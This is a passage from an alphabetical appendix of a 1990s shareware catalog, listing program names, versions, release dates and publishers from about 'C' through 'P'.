Sys) 3.3 (10-01-93) Torbert Data + Systems, Inc. + CNA/NURSE ASSISTANT REVIEW 3.O (03-12-93) PC-DSD + CODE-A-LINE 1.0 (03-22-94) Optimax Corporation + Code.Print for Visual Basic 2.23 (06-19-95) Caladonia Systems, + inc. + CodeLister 1.21 (08-15-93) Malcolm D. McDowell + COLOR CROSS 1.04 (08-02-94) Cold Water Software + Color Fun 1.0 (05-06-94) Burnham Park Software, Inc. + ColorDOS 1.52 (06-24-93) KroTek Electronics + Colored Toolbar Icons for Word 2.0 (05-02-95) AMF Shareware + Productions + COM-AND 2.93 (11-17-93) CABER Software + ComeBack 3.0 (01-06-94) MicroTools Inc + Command Post 8.0 (10-31-92) Wilson WindowWare, Inc. + CommEx 1.00 (08-01-95) Cottonwood Software + COMpanion 1.2 (08-01-94) Oxford House Software + The Complete Image 3.11 (07-01-93) Hot Wax Software + The Complete Morph 2.10 (02-26-94) Hot Wax Software + Computer Dictionary 1.20 (12-29-94) Gary FitzGerald + Computer System Manager 1.41 (02-19-94) RMH Computer Services + Contact Browser 2.5b (08-25-95) Moore Software Solutions + Contact Manager 2.21 (10-12-94) CPI computer services + Contact-Lens! 2.3 (04-15-94) Kruse Control Software + Content Label Rating 1.0 (10-08-94) R.K. West Consulting + CONTRACT BRIDGE 2.0 (07-10-95) Wells Computing Services + Convert 2.01 (06-03-93) Bit Masons Consulting + Convert It!(tm) SE 3.0 (07-08-94) SMI Corporation + CPR ByStander Review 2.O (03-12-93) PC-DSD + CrabWise 1.0 (01-01-94) Shawn Anderson SoftWare + Creativity Package 4.0a (07-29-95) R.K. West Consulting + Crossdown 2.8 (05-13-93) CROSSDOWN + Crossdown for Windows 1.1 (02-07-95) CROSSDOWN + Crossword Clipper for DOS 2.00 (04-15-94) PC HELP-LINE + Crossword Clipper for Windows 2.00 (04-15-94) PC HELP-LINE + Crossword Creator 6.00 (04-15-94) PC HELP-LINE + CrossWords 1.42 (04-08-95) Glen DeBiasa + Crowndale Tales : ESCAPE! 1.0 (08-17-95) Crowndale Productions + Crush v1.3 (11-05-94) PocketWare + Cryptik 1.4 (10-02-93) Cascoly Software + Crypto! 2.0 (03-01-94) KMR Consulting + + Appendix E, "Sorted list of all programs" 849 + + + + Crystal Ball 4.0 (05-12-95) R.K. West Consulting + CS/AMORT 2.10 (10-08-94) Computer Solutions, Inc. + CTS Serial Port Utilities 1.2 (12-06-93) Computer + Telecommunication Systems, Inc. + CULTURAL AWARENESS 1.13 (05-04-94) Awareness Productions + Cumberland Diary 1.3 (01-01-94) Cumberland Family Software + Cumberland Family Tree 3.5 (01-01-94) Cumberland Family + Software + Cumberland Story 1.2 (01-01-94) Cumberland Family Software + Curses! 3.1 (05-17-95) R.K. West Consulting + CUSTOM SCREEN SAVER (WINDOWS) 1.0 (01-15-94) Accidental + Software + CzarInstall for DOS 1.02 (04-20-95) CZAR Software + CzarList for VBDOS 1.10 (10-29-94) CZAR Software + D86 Debugger 3.22 (01-20-90) Eric Isaacson Software + Daily Log Book 2.1 (09-01-93) Sequential Software, Inc. + DaMenu 2.01 (06-04-94) Just-In-Time Computing Services + DARN! Don't Forget! 4.00 (05-31-95) EmmaSoft Software Company, + Inc. + DasBOOT! 3.0 (10-01-94) WHEEL Games + DATA MASTER 3.1 (11-24-93) RKS Software, Inc. + DATA PROTECTOR 2.00 (02-01-95) PIGAS INC. + Data Wire Four 1.4.1 (07-20-95) C & R Business Systems Ltd. + DATABASE BROWSER 1.21 (04-15-95) Redei Enterprises + Dave Dude 2.1 (05-14-95) APG + A Day at the Races 1.1 (10-26-94) LatticeWork Software + Day By Day 1.3 (05-05-95) Q&D Software Development + DayMaster 4.10 (09-01-94) Unicorn Software Limited + DAYO ACCOUNTS PAYABLE (AP) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO ACCOUNTS RECEIVABLE (AR) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO BACK ORDERS (BO) 4.50+ (02-01-94) TJS LAB, Inc. + DAYO BAR CODE 3 OF 9 4.55+ (03-01-94) TJS LAB, Inc. + DAYO BILLING & INVOICING 4.61+ (03-01-94) TJS LAB, Inc. + DAYO END OF PERIOD 4.50+ (02-01-94) TJS LAB, Inc. + DAYO GENERAL LEDGER (GL) 4.60+ (03-01-94) TJS LAB, Inc. + DAYO INDEX 4.50+ (02-01-94) TJS LAB, Inc. + DAYO INVENTORY 4.56+ (03-01-94) TJS LAB, Inc. + DAYO LITTLE POS 4.62+ (03-15-94) TJS LAB, Inc. + DAYO MEMBERSHIP 4.40+ (01-01-94) TJS LAB, Inc. + DAYO MENU 4.14+ (12-01-93) TJS LAB, Inc. + DAYO MRP 4.61+ (03-15-94) TJS LAB, Inc. + DAYO ORDER ENTRY 4.60+ (03-01-94) TJS LAB, Inc. + DAYO PASSWORDS 4.50+ (01-01-94) TJS LAB, Inc. + DAYO PAYROLL 4.61+ (03-01-94) TJS LAB, Inc. + DAYO POS (POINT OF SALE) 4.61+ (03-01-94) TJS LAB, Inc. + DAYO PRICE BOOK 4.50+ (12-01-93) TJS LAB, Inc. + DAYO QUOTES 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RENTAL POS 4.61+ (02-01-94) TJS LAB, Inc. + DAYO RETURN MANAGEMENT SYSTEM 4.00+ (12-01-94) TJS LAB, Inc. + DAYO SALES MANAGEMENT SYSTEM 4.42+ (02-01-94) TJS LAB, Inc. + DAYO SERVICE DISPATCH 3.20+ (03-01-94) TJS LAB, Inc. + DAYO SIMPLE POS 4.61+ (01-01-94) TJS LAB, Inc. + DAYO SMART REPORTS 4.51+ (12-01-93) TJS LAB, Inc. + DAYO TIME & BILLING 4.50+ (12-01-93) TJS LAB, Inc. + + Appendix E, "Sorted list of all programs" 850 + + + + DAZZLE 5.1b (03-19-95) Worldwide MicroTronics, Inc. + dbDIAL(tm) 1.02 (01-06-92) ZPAY Payroll Systems, Inc. + DBKIT 2.5 (03-01-94) P. C. Softsmith + DDE Requester for Win3.x & NT 1.01.00 (03-31-94) Westerdale AG + DDKEY 2.02 (12-12-93) David M. Dibble + Dear Diary 3.0 (06-22-95) Q&D Software Development + Declaration of War 1.1 (08-15-94) Burnham Park Software, Inc. + The Deer Expert 4.2 (05-01-94) Strat-Tech, Inc. + The DemoMaker 1.55 (04-02-94) Ron Janorkar + DeskTop Advisor(R) 2.0 (12-04-93) Ivden Technologies, Inc. + DEXTER Text Editor 2.00 (01-16-95) FAGERLUND CONSULTING + DFInfo VBX 2.1 (08-14-94) Mabry Software + The Dialer 2.30 (08-26-93) GRH Software + Diamond Data 4.6 (07-30-94) The Software Construction Co. + DIFF 1.21 (10-15-94) C.Sitte Softwaretechnik + Directory Freedom 4.61 (06-03-93) Bit Masons Consulting + DISASTER 1.0 (01-01-92) Feico Nater Shareware + Disk Drive Cleaner 1.0 (10-24-93) Rosenthal Engineering + Disk Piecharter 1.1 (03-08-95) Zorn Software + DISK SPOOL II 5.04 (12-29-94) Budget Software Company + DISKCOPY 1.0 (01-01-92) Feico Nater Shareware + DISKLIST 3.06 (01-25-94) Gulf Sierra + DiskMan for Windows 2.1 (04-01-93) Diskmaster Software + DizView 2.0 (06-09-95) Lincoln Beach Software + DJ-CHECK 2.01 (04-29-93) JMJ Software + DJ-LOPE 4.01 (03-27-93) JMJ Software + DJ-SLEEVE 2.0 (01-19-93) JMJ Software + dMAIL4 4.0.1 (07-20-95) C & R Business Systems Ltd. + DMalloc 1.0 (10-11-92) Software & Consulting + DMPLAS (Dot Matrix to LaserJet) 1.1 (11-15-91) Software Co-op + DO 4.3 (01-01-95) RobiNets + DOC DEFIANT 1.0 (02-01-94) Just For Me Software, Inc. + DOS Menu 2.20 (05-05-95) MicroFox Company + DOS Summary 1.01 (02-23-91) Computer Knowledge + DOS Summary (Hypertext) 2.0 (02-15-92) Computer Knowledge + Double Directory 1.40 (06-01-93) 100% Cotton Software + dPerfect Merge 2.0 (05-16-95) Newdorf Research + DR. FORM 3.1 (03-01-94) IrwinWare + DR. Memory 3.3 (01-09-94) Cooney Applied Technology + DRAFT CHOICE 2.00e (01-06-94) TRIUS, Inc. + Drag 'n' Drop Utils for Win NT 1.42 (09-26-94) clySmic + Software + Drag and Drop Printing v2.0 (02-01-94) FLFSoft Inc. + Drag And View 2.0 (07-12-93) Canyon Software + Drag And Zip 2.41 (06-22-93) Canyon Software + Dragons Bane: Mah Jongg II 1.0 (06-01-95) Arcanum Computing + DRIVEMAP 1.2 (08-01-94) Oxford House Software + DRIV_MAN 1.30 (10-31-94) MicroMetric + dtSearch for DOS 2.0 (04-14-93) DT Software, Inc. + dtSearch for Windows 2.0 (04-14-93) DT Software, Inc. + dVERSION 2.0 (09-05-93) C & R Business Systems Ltd. + DXF Bill of Materials Generator DOS1.00 (03-01-95) Annabec + Business Services + Early Bird 1.0f (03-01-95) Burnham Park Software, Inc. + + Appendix E, "Sorted list of all programs" 851 + + + + Easy Backup 4.5 (06-15-95) Easy Software + Easy Base 9.0 (06-10-95) Easy Software + Easy Install 4.4 (06-15-95) Easy Software + Easy Menu 6.4 (06-16-95) Easy Software + Easy Word 9.2 (06-16-95) Easy Software + Easydial 4.5 (01-22-93) Patri-Soft + Ecomaster 2.04 (11-03-92) Cascoly Software + Econ's Arena 1.04 (05-18-95) Glen DeBiasa + EDDY (EDit DirectorY) 7d (08-30-93) ScofWare Associates + Edens-for-two 4.3 (03-18-94) Martlet, Inc. + EDGEFLOW 5.0 (02-24-93) Pacestar Software + EDITEUR V2.2 (06-30-95) Jean-Pierre Menicucci + Edwin Basic Math Add/Subtract 3.00 (06-01-93) Edwin + Educational Software + EGA Mouse Paint 5.0 (10-29-93) Fischer Grafix & Software + EGATrek 3.1 (09-01-94) Arcanum Computing + EGAWHEEL V.1.91 (12-18-93) WHEEL Games + Elbow Grease for Windows v1.0 1.0 (05-02-95) AMF Shareware + Productions + Electronic Postal Window(tm) 1.6 (07-09-95) EmmaSoft Software + Company, Inc. + The Electronic Square 1.03 (06-19-95) Electronic Creativity + Products + ELFTREE 3.01S (12-28-93) Elvish Consulting + ELMER 1.00 (05-01-92) Software for Amateur Radio + EMERI 1.3 (05-01-93) Rhode Island Soft Systems, Inc. + EMS4C Library 1.0 (10-18-93) MarshallSoft Computing, Inc. + Enigmacross 1.5 (06-12-93) CROSSDOWN + ENTER-EASE 1.1 (09-29-94) KAYL SOFTWARE + EnVision Publisher 1.0 (09-01-92) Software Vision Corporation + ENVI_MAN 1.10 (01-01-94) MicroMetric + Equatron 2.10 (07-08-95) Glen DeBiasa + ES-NEWS 2.29 (05-01-95) Extensions Software Corporation + ES-NMB 1.25 (05-01-95) Extensions Software Corporation + ESF's DeskJet Fonts & Utilities 1.7 (08-24-93) Elfring Soft + Fonts + ESF's European DeskJet Fonts 1.2 (05-21-92) Elfring Soft Fonts + ESF's European LaserJet Fonts 1.2 (05-20-92) Elfring Soft + Fonts + ESF's LaserJet Fonts & Util. 1.7 (08-24-93) Elfring Soft Fonts + ESF's PC Write Fonts 1.0 (09-25-92) Elfring Soft Fonts + ESF's Scalable LJ III Fonts 1.3 (08-24-93) Elfring Soft Fonts + ESF's Super Fonts I 1.3 (08-24-93) Elfring Soft Fonts + ESF's TrueType Collection 1 1.1 (08-24-93) Elfring Soft Fonts + ESPTEST 1.0 (05-26-92) Selfhelp Software + ETCAI Electronics Instruction 1.24 (07-15-93) ETCAI Products + Examine 1.12 (08-08-94) Aquila Software + ExamineZip 1.01 (08-08-94) Aquila Software + Exit Master for Word 6.0 1.0 (05-02-95) AMF Shareware + Productions + EXPRESSCALC 4.10 (05-02-92) Expressware Corporation + EXPRESSCHECK 4.04 (11-18-93) Expressware Corporation + EXPRESSGRAPH 1.05 (05-01-92) Expressware Corporation + EXTENDED BATCH LANGUAGE-PLUS! 4.08 (04-12-93) Seaware Corp. + + Appendix E, "Sorted list of all programs" 852 + + + + Extract It 1.00 (07-14-95) TeraByte Unlimited + EZ-Tree 2.30 (05-05-95) MicroFox Company + EZinst 1.2 (07-28-94) Burnham Park Software, Inc. + EZSET 2.1 (12-05-93) McAdams Associates + Family Calendar for Windows 1.30 (04-18-95) Command Line + Software + FastBreak Fantasy Basketball 3.08 (02-18-94) McS Custom + Software + FAXHAVEN 1.0 (10-01-94) HTF Consulting + FDplot 1.3 (07-12-92) Abri Technologies, Inc. + THE FEELING'S MUTUAL-DOS 3.1.93 (04-01-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-Macintosh 3.1.93 (04-15-94) Interpretive + Software Inc. + THE FEELING'S MUTUAL-WINDOWS 3.1.93 (04-01-94) Interpretive + Software Inc. + FF Business Cards 1.0 (12-08-94) M & R Technologies, Inc. + FF Designer Envelopes 1.2 (12-01-94) M & R Technologies, Inc. + FF Graphics Conversion Utility 1.1 (12-20-94) M & R + Technologies, Inc. + Fictionary 1.32 (04-30-90) Cascoly Software + File Commander 2.0K (10-31-92) Wilson WindowWare, Inc. + FILE EXPRESS 5.1 (12-10-93) Expressware Corporation + File Finder for Windows 3.0 (08-22-94) Simian Id Software + File Finder/Grouper 2.02 (04-16-95) EnGamma + File Manager Jr. 1.2 (12-07-94) Charles R. Maher + File Maven 3.0 (03-14-95) Kent Briggs + FileFinder 4.4 (09-20-93) California Software Design + FileMod 1.2 (06-17-95) Lincoln Beach Software + FileSafe 1.02 (05-15-94) JAYAR Systems + FILE_MAN 4.30 (01-01-94) MicroMetric + Financial Analysis For Windows 4.0 (08-01-95) Gjetaas, Inc. + Financial Freedom 2.0 (02-01-94) M & R Technologies, Inc. + Financial Freedom Billing Mgr. 2.3 (12-15-94) M & R + Technologies, Inc. + Financial Freedom GOLD 1.0 (03-30-94) M & R Technologies, Inc. + FINANCIAL WIZARD(tm) 5.35 (05-29-93) SilvaSoft Software, Inc. + Finders Keepers 1.01 (04-08-95) Glen DeBiasa + First Impression 3.1 (06-09-95) Lincoln Beach Software + The Fish Expert 3.2 (05-01-94) Strat-Tech, Inc. + FishBase ][ 3.0 (08-04-93) Olsen Outdoors + Fishtime 2.2 (01-15-94) C & E Associates + Fixed Asset Pro 2.1 (07-15-95) HammerSoft, Inc. + Flexitime/Time Logging 5.32 (06-01-95) HJS Systems + FLOPTOOL 1 (01-01-92) Feico Nater Shareware + FlowDraw Plus 1.00 (03-20-95) + FLUX 1.0 (03-31-93) MOONLITE Software + Flu_Shot+ 1.83 (07-11-93) Software Concepts Design + FMDrop VBX 1.1 (08-14-94) Mabry Software + Folders 2.0 (03-22-95) Target Software + Folders 3.4d (01-12-92) Sloop Software + FONEFILE 5.0a (10-01-93) Business Enhancement Partnership + Group + FontBook Professional 2.7 (06-13-94) The C Group, Inc. + + Appendix E, "Sorted list of all programs" 853 + + + + Fonter 6.2 (04-15-94) OsoSoft + FontMe! 2.5 (10-29-93) Fischer Grafix & Software + Fonts Ink Fonts 1 (01-04-93) Software Co-op + FootPrint 1.4 (11-16-93) SUPERWARE + Form Editor (FED) 1.13 (05-05-95) MicroFox Company + Fortune Teller 4.4 (10-02-94) R.K. West Consulting + FPLAN-KWIK Financial&Retire Pln 1.0 (06-14-94) First Financial + Software + Free System Resources 1.0 (12-29-94) Chet Williams + FreeForm 2.3 (11-01-94) Herne Data Systems Ltd + French Dictionary for Word 6.0 1.0 (05-02-95) AMF Shareware + Productions + Frenetic Screensaver 3.3 (06-01-95) Seraline Pty Ltd + From Scratch recipe processor 3.04 (11-01-94) Desktop + Solutions + FSave 1.1 (03-15-95) KMR Consulting + FSLOGIN 2.01 (07-01-95) Confirm + FundRaiser Basic 1.32 (03-08-95) Professional Support Software + FYI/For Your Eyes Only 2.3 (03-12-93) PC-DSD + FYI2/Business Office Manager 2.3 (03-12-93) PC-DSD + GAKUSEI 1.1.3 (06-12-94) Barham Software + GammaCAD 1.10 (02-01-94) Gamma Software + GARDENING BUSINESS 1.1 (03-25-95) Redei Enterprises + GEMCAP 4.02 (03-07-93) Natural Software + Geomancy 4.7 (05-19-95) R.K. West Consulting + GetBack 2.4 (12-24-92) MicroTools Inc + Golf Tournament Scorekeeper 1.2 (07-04-94) Home Alone Software + Golfhcap 3.4 (01-15-94) C & E Associates + GRAB Plus(r) 6.5 (04-26-93) ZPAY Payroll Systems, Inc. + GradeBook for Windows 3.06 (01-24-95) R&R EdWare + Grafer Line Graphs for Reports 2.1 (04-15-95) Lovell's + Grammar Expert 1.02 (02-15-93) Wintertree Software Inc. + Graphcat/DOS Clip Art Cataloger 3.1 (06-20-94) Science + Translations Software Services + Graphcat/Win Clip Art Cataloger 3.2 (02-01-95) Science + Translations Software Services + GREEN 1.11 (05-10-93) Cascoly Software + GridForm 1.0 (12-15-91) Software Co-op + Grocery Manager for Windows 2.31 (11-05-94) Absolute Value + Software + Grow'Em 3.0 (03-01-95) Paul Postuma + GS TROOP TRACKER 1.1 (11-15-93) Robert Barrentine Consulting + Hands On Remote Control/Access 5.5 (08-29-95) P. C. Softsmith + HandyDOS 1.6 (10-22-92) Abri Technologies, Inc. + Hang Man 1.1 (08-16-94) Burnham Park Software, Inc. + HANG4.ZIP 4.1 (12-08-93) Larry W Parker + HangWin 2.04 (07-15-95) Temprano Software + Hard Disk Director 5.2 (03-15-92) Canyon Software + Hard Wire Four 2.8.1 (07-20-95) C & R Business Systems Ltd. + Hardware/Software Info Manager 1.4 (07-01-93) Alpine Software + Have You Read That Movie? 1.0 (04-01-91) 100% Cotton Software + HDM - Hard Disk Menu 5.01 (05-05-95) MicroFox Company + HDTEST 5.35a (10-20-91) Computer Counselors, Inc. + Heart Smart 2.0 (04-25-95) Henning Associates + + Appendix E, "Sorted list of all programs" 854 + + + + Hearts 6.6 (08-06-93) CareWare + Hebrew Edit 1.2b (02-14-94) Right to Left Software + HELLLP! 1.0c (11-20-93) Guy Software + Helpgen 1.20 (09-06-94) Rimrock Software + HexEdit 1.51 (12-01-92) Al Funk + HiMOVE 2.20 (05-12-93) C.Sitte Softwaretechnik + HiVIDEO 2.03 (05-08-93) C.Sitte Softwaretechnik + HOLD-ANYTHING! 1.1 (02-21-93) Elk Creek Software + Home Plan 2.7 (11-01-94) Home Plan + Home Refinancing 1.2 (03-21-94) ProDomus, Inc. + HOME/OFFICE INVENTORY 1.0 (03-28-94) ProDomus, Inc. + HortMan 1.0 (11-10-93) Sunrise Software + Household Register 3.12 (12-27-93) TurboSystemsCo + HouseHold TRACKER 1.6 (10-29-93) Fischer Grafix & Software + How to join as a "beta" author n/a (11-27-89) Association of + Shareware Professionals + HQ-FAX (1-Step High Quality FAX 2.0 (09-30-94) HTF Consulting + Hubble 2.21 (06-15-95) Hubble Software Company + I Ching Empower Tool 1.0 (05-02-95) Empower Tools + I&M USA 1.05 (05-05-94) C T Johnson, Inc + IBM PC Author Application n/a (11-14-92) Association of + Shareware Professionals + ICL Builder 1.0 (06-06-93) Sloop Software + ICP 11 (02-01-94) Spirit7 Software, Ltd. + Image'n'Bits 1.0 (11-24-93) Bananas Software Inc + INFOMANIA 2.1 (05-10-95) Brian Sutton + Information about copyrights n/a (04-29-90) Association of + Shareware Professionals + IniCon VBX 3.1 (08-14-94) Mabry Software + Inspect & Install for Windows 1.10 (02-26-94) M2w Software + INSTINDX 1.0 (09-01-94) C T Johnson, Inc + INSTSPEC 1.0 (05-05-93) C T Johnson, Inc + Integrity Master(tm) 2.11a (11-04-93) Stiller Research + INVENTORY & COST CONTROL 4.2 (01-15-94) First Step Software + Inventory Interface 7.25 (04-01-95) Data Interface + J-Works 2.2 (03-01-95) MicroWorks Inc. + J.T.S. TIME SHEETS 1 (09-20-94) Easy Software + JailBird 2.11 (11-05-93) RMH Computer Services + Jasc Media Center 2.02 (07-13-95) JASC, Inc. + Jason's File Finder 2.0d (09-03-93) RMH Computer Services + Jewel Thief 1.3 (04-27-93) ServantWare + JobLog Project Timekeeper 2.0 (05-08-95) Brian Sutton + Jokes & Quotes 1.4 (02-12-94) Michael L. Wester + JoyStk VBX 1.2 (08-14-94) Mabry Software + JRchive 1.02 (11-01-93) JAYAR Systems + JRE Home Inventory 6.3 (09-30-94) JRE Enterprises + Judy's TenKey 3.0 (10-20-94) Judy's Applications + KAPIAN : Chinese Flash Cards 1.1 (02-02-92) Selfhelp Software + Katelin Comment Manager 1.20 (09-26-94) Katelin, Inc. + Keyboard Coach Fantasy Football 1.03 (01-08-94) McS Custom + Software + Keyed File System (DOS) 2.12 (05-16-94) APT Computer + Solutions, Inc. + + Appendix E, "Sorted list of all programs" 855 + + + + Keyed File System (OS/2) 2.12 (04-11-94) APT Computer + Solutions, Inc. + Kid's Art 1.1 (09-20-94) R.K. West Consulting + Kith and Kin 2.03 (07-22-94) SpanSoft + LABEL MASTER 5.1c (11-24-93) RKS Software, Inc. + LABELS-PLUS Labeling System 3.0 (05-01-93) GRAFTech + Development Corporation + LAN Menu 2.05 (05-05-95) MicroFox Company + LAN-LINK 2.20 (07-04-93) Software for Amateur Radio + Landscape Explorer 3.01 (01-01-95) WoolleySoft + LAPC - Loan Advisor for the PC 2.3 (04-01-94) J.D. Consulting + Associates + LASR_MAN 6.05 (10-31-94) MicroMetric + the last word 1.00 (11-25-90) Bit Masons Consulting + The Lawyer's DeskTop 2.1 (07-25-94) DataPro Enterprises, Inc. + Layout 3.1 (03-25-92) Software Co-op + LEADING AND MANAGING OTHERS 1.0 (09-19-94) Chatfield Software, + Inc. + League Manager 1.90 (04-16-94) Al Dodd Software Co. + LEANER 2.20 (11-22-93) MoonStone Software + Lecture 1.02 (12-14-92) Barn Owl Software + LegRoom 3.0 (02-06-95) Ivden Technologies, Inc. + LessonPlanZ 2.60 (09-01-94) Unicorn Software Limited + The Letterhead Kit/DOS 3.0 (06-28-93) Science Translations + Software Services + The Letterhead Kit/Win 3.0 (02-25-95) Science Translations + Software Services + The Lights Go Down 2.20 (07-07-95) Thomas Hoevel Software- + Development + LineDrive Fantasy Baseball 6.13 (02-18-94) McS Custom Software + LinguaPro/SPANISH 2.50 (09-06-94) Schulenberg and Associates, + Inc. + Link 2.1 (05-01-95) Target Software + ListBuilder 1.1 (06-27-95) Younkin Enterprises + Little Black Book 3.0 (10-25-94) Q&D Software Development + Little Lists 3.2 (07-28-95) R.K. West Consulting + LJ-SLEEVE 2.0 (06-11-92) JMJ Software + LJLAND v3.11b (07-01-93) TAXWARE + Loan Master 1.52.14 (10-01-94) Bottom Line Software, Inc. + Local Access Logon 2.12 (10-12-94) M2w Software + LOCATE 2.00 (06-01-93) System Solutions Company + Lotto Challenger 3.8 (05-01-94) Data Solutions + LOTTO MANIA 2.01 (01-01-95) Robert O. Leafloor + Lotto Prophet 5.0 (01-05-95) DataMicro, Inc. + Lotto Thunder (PICK-6 Version) 1.4 (05-01-95) Charles P.Staats + LPRINT 2.1 (02-22-94) Paragon Innovations, Inc. + LQ 2.35 (10-01-90) Granny's Old-Fashioned Software + LUDWIG 1.0 (01-01-92) Feico Nater Shareware + LVN/Vocational Review Program 2.1 (03-12-93) PC-DSD + LZW Data Compr. Lib for Windows 1.0 (07-12-94) MarshallSoft + Computing, Inc. + LZW Data Compression for C 1.4 (06-01-94) MarshallSoft + Computing, Inc. + + Appendix E, "Sorted list of all programs" 856 + + + + LZW Data Compression for Pascal 1.4 (06-01-94) MarshallSoft + Computing, Inc. + MacIntosh Author Application n/a (09-03-92) Association of + Shareware Professionals + THE MAGIC OF THE MIND 1.0 (10-13-93) Donald E.J. Field + MAGIC SQUARES 1.0.3 (09-14-93) Randy A. Harris + Mah Jongg-Solitaire 4.2 (09-01-94) Arcanum Computing + Mail Machine v3.0k (12-24-92) TAXWARE + Managing Your Food 4.51 (01-01-94) MYF Software + MAPIT 1.4 (04-15-94) Allison Software + MARGARINE 3.11 (01-01-93) Tay-Jee Software + Marnav 2.2 (01-15-94) C & E Associates + Mass-Store Copy 2.6 (04-01-91) Informative Technologies + Master Chef Release One (01-23-93) Acme Workshops + Master Disk 2.0 (10-24-93) Rosenthal Engineering + Master Meal Manager 1.51 (01-09-92) Acme Workshops + Math Bingo 1.1 (10-26-94) LatticeWork Software + MATH CHALLENGE 2.0 (03-01-94) Just For Me Software, Inc. + Math Rescue #1 1.0 (02-10-93) Redwood Games + Math Wiz 2.0 (06-15-95) Informatik Inc. + MathCounts 1+2 1.2 (01-07-94) Able Art Software + MathCounts 3+4 1.2 (01-07-94) Able Art Software + Mathplot 3.2 (11-21-92) Phillip H. Sherrod + MAXI Form 1.8 (12-01-93) Herne Data Systems Ltd + Mayan Calendar 3.8a (12-27-94) R.K. West Consulting + MAZE3 3.0.6 (01-19-89) Stiller Research + MAZEMAKER for Windows 2.01 (03-01-93) Custom Real-Time + Software, Inc. (CRTS) + MCBase 1.1e (06-01-94) Harry Doldersum + MDS OBRA ASSESSMENT TOOL 2.4 (01-10-93) PC-DSD + Me & My Metabolism 1.20 (12-12-93) MoonStone Software + Medieval War 1.5 (02-16-95) Burnham Park Software, Inc. + Medieval War Door 1.0 (02-21-95) Burnham Park Software, Inc. + MEG SYSTEM INFO GRAPHS PIE 3-D 3.5 (07-30-94) Jim Tolliver + MEGA EDIT Editor for Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + MegaBack Hard Disk Backup 2.3 (04-27-93) Patri-Soft + MegaHost 2.21 (09-02-93) ASCII Computer Enterprises + MegaWord 6.01 (04-26-94) Merlot International + MEGIK 1.1 (09-20-94) Advanced Topics + Melissa's Music Flashcards 3.1 (10-28-93) Fischer Grafix & + Software + MenuEv VBX 3.1 (08-14-94) Mabry Software + MENU_MAN 2.00 (01-01-94) MicroMetric + MERIT BADGE TRACKER 3.1 (12-04-93) Robert Barrentine + Consulting + MERLIN'S MATH 1.03 (05-04-94) Awareness Productions + METRIC-X 2.03 (09-01-93) Orion Development Corporation + MicroCook 1.81 (06-23-95) NORSKi Software + MicroFox DOS Utilities 1.14 (05-05-95) MicroFox Company + MicroPlayerCD(tm) 1.03 (02-26-94) Daniel Thomas + Minefield For Everybody 1.1 (06-01-94) Judah Warshaw + Money Organizer 2.0 (04-11-95) Redei Enterprises + More Control 2.0 (06-02-93) Sloop Software + + Appendix E, "Sorted list of all programs" 857 + + + + MotelMAX 2.10 (05-01-94) MKM Software + Mouse Clock (tm) for Windows 1.0 (05-02-95) AMF Shareware + Productions + Mouse Math 1.0 (08-15-95) Hufnagel Software + MouseTools 1.0 (09-13-89) Arcanum Computing + MOZART (Virtuoso Edition) 1.3 (01-03-95) David Webber + MS Mega Pack (VBXes) 1.0 (08-14-94) Mabry Software + MSlot VBX 1.0 (08-14-94) Mabry Software + MultiLabel 3.5 (04-01-94) OsoSoft + MultiVu 1.1 (03-17-95) Ivden Technologies, Inc. + Music and Video Librarian v3.8 3.8 (08-24-93) Alpine Software + Music Sculptor for Windows 1.4 (03-07-94) Aleph Omega Software + Musical Instrument Tuner 1.01 (02-23-94) SoundByte Software + A MUSICAL TUTORIAL 1.1 (06-01-95) R. Swerdfeger + A MUSICAL TUTORIAL for Windows 1.2 (06-01-95) R. Swerdfeger + MusicEase 4.11 (10-25-94) RMH Computer Services + My Life 2.2 (09-30-94) JRE Enterprises + Mystic Pixels 1.1 (06-06-94) Tesuji Technology + NAMEBASE 3.2 (02-26-93) Elk Creek Software + National INNdex 5.05 (05-01-95) Nelson's Computer Services + NeMenu 1.01 (12-01-93) Just-In-Time Computing Services + NETWORK QUOTABLES 2.01a (02-15-93) Greg Bixby + New Menus for Windows 1.41 (11-29-94) Dipl.Ing. Roger Rene + Kommer + New Testament for Windows 1.61 (04-04-94) Rocky Mountain + Laboratories + NewBase 1.0 (03-15-95) GWN Software + NFL Forecaster for DOS 2.0d (08-15-94) 100% Cotton Software + NFL Forecaster for Windows 3.0w (06-01-94) 100% Cotton + Software + NOACH 2.4 (01-04-92) Feico Nater Shareware + Nominal Pipe Size for Windows 2.1 (03-28-94) Herne Data + Systems Ltd + Nonlin 2.4 (06-25-93) Phillip H. Sherrod + NoteWorthy 1.87 (12-29-94) Braeburn Software + Notice Board 2.2 (03-07-94) Cornerstone Software Limited + NPS - Nominal Pipe Size 2.1 (10-01-92) Herne Data Systems Ltd + NUMERO UNO 1.05 (11-19-94) Christopher J. Noyes Software + O.R.B.Y. 1.0 (12-21-93) Able Art Software + Off-line CIS Catalog Viewer 1.11 (05-26-93) + Office Supplies Tracker 1.42 (03-18-94) RMH Computer Services + Official ASP Catalogs n/a (01-01-80) Association of Shareware + Professionals + Oil Baron 1.2 (05-11-93) Al Funk + OMNIDay 4.30 (10-01-94) Unicorn Software Limited + OMNIDay For Windows 2.70 (02-28-95) Unicorn Software Limited + OMS (Organizational Mgmt System 2.3 (11-01-93) Torbert Data + Systems, Inc. + On This Day 2.0 (07-30-94) The Software Construction Co. + On This Day for Windows 2.0 (07-30-94) The Software + Construction Co. + ON-SIDE 2.0 (10-20-93) Expressware Corporation + Open Menu 2.5 (03-18-94) P. C. Softsmith + OpenHome 3.10 (07-16-95) Temprano Software + + Appendix E, "Sorted list of all programs" 858 + + + + Over_LAZ HP 4 (01-01-94) Herne Data Systems Ltd + Over_LAZ PS 3 (01-15-93) Herne Data Systems Ltd + P.I.M. for Word 6.0 for Windows 4.2b DB+ (05-02-95) AMF + Shareware Productions + Paint Shop 3.0 (08-14-93) JASC, Inc. + Paint Shop Pro 3.1 (08-11-95) JASC, Inc. + PALERT 2.4 (10-22-91) Patri-Soft + Palette Adjuster 1.8 (06-17-95) Lincoln Beach Software + Palette Pleezer 1.25 (04-10-93) Cascoly Software + Paper Route Ledger 1.40 (04-25-94) RMH Computer Services + Papers 1.00 (12-01-93) clySmic Software + PATH_MAN 1.15 (01-01-94) MicroMetric + PATIENCE 10 4.01 (05-21-94) CoCoWare - Cowles Company Software + Patience Abroad 1.01 (05-21-94) CoCoWare - Cowles Company + Software + 